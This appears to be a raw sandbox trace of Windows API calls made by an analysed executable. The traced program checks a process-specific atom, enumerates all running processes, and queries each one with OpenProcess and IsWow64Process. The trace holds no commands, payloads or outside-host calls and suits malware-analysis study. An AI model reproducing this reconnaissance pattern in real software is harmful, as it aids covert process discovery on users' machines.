	[0070.745] GetLastError () returned 0x5
	[0070.745] GetLastError () returned 0x5
	[0070.746] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.746] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0070.746] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.746] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.747] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetLastError () returned 0x5
	[0070.748] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.748] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0070.748] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0070.748] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0070.748] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0070.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0070.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.748] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0070.749] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.749] CloseHandle (hObject=0x224) returned 1
	[0070.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e860, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0070.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0070.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.749] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0070.749] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.749] CloseHandle (hObject=0x224) returned 1
	[0070.749] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0070.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16a98) returned 0xc0000004
	[0070.799] VirtualAlloc (lpAddress=0x0, dwSize=0x16b98, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0070.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16b98, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0070.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0070.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772158, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0070.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0070.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0070.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0070.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0070.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0070.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0070.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0070.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0070.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0070.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0070.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0070.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0070.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0070.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0070.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0070.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0070.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0070.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0070.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0070.803] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.803] CloseHandle (hObject=0x224) returned 1
	[0070.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0070.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0070.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0070.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0070.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0070.804] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.804] CloseHandle (hObject=0x224) returned 1
	[0070.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a18, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0070.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0070.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0070.804] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.804] CloseHandle (hObject=0x224) returned 1
	[0070.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0070.804] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.804] CloseHandle (hObject=0x224) returned 1
	[0070.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0070.804] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.805] CloseHandle (hObject=0x224) returned 1
	[0070.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0070.805] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.805] CloseHandle (hObject=0x224) returned 1
	[0070.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7289f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0070.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0070.805] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.805] CloseHandle (hObject=0x224) returned 1
	[0070.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0070.805] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.805] CloseHandle (hObject=0x224) returned 1
	[0070.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0070.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0070.805] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.805] CloseHandle (hObject=0x224) returned 1
	[0070.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0070.806] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.806] CloseHandle (hObject=0x224) returned 1
	[0070.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0070.806] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.806] CloseHandle (hObject=0x224) returned 1
	[0070.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728958, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0070.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0070.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0070.806] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.806] CloseHandle (hObject=0x224) returned 1
	[0070.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0070.806] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.806] CloseHandle (hObject=0x224) returned 1
	[0070.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dcf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0070.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0070.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.807] CloseHandle (hObject=0x224) returned 1
	[0070.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728978, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0070.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0070.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.807] CloseHandle (hObject=0x224) returned 1
	[0070.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e888, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0070.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0070.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.807] CloseHandle (hObject=0x224) returned 1
	[0070.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7289f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0070.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0070.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.807] CloseHandle (hObject=0x224) returned 1
	[0070.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0070.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0070.807] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.807] CloseHandle (hObject=0x224) returned 1
	[0070.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0070.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0070.808] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0070.808] CloseHandle (hObject=0x224) returned 1
	[0070.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728a98, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0070.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
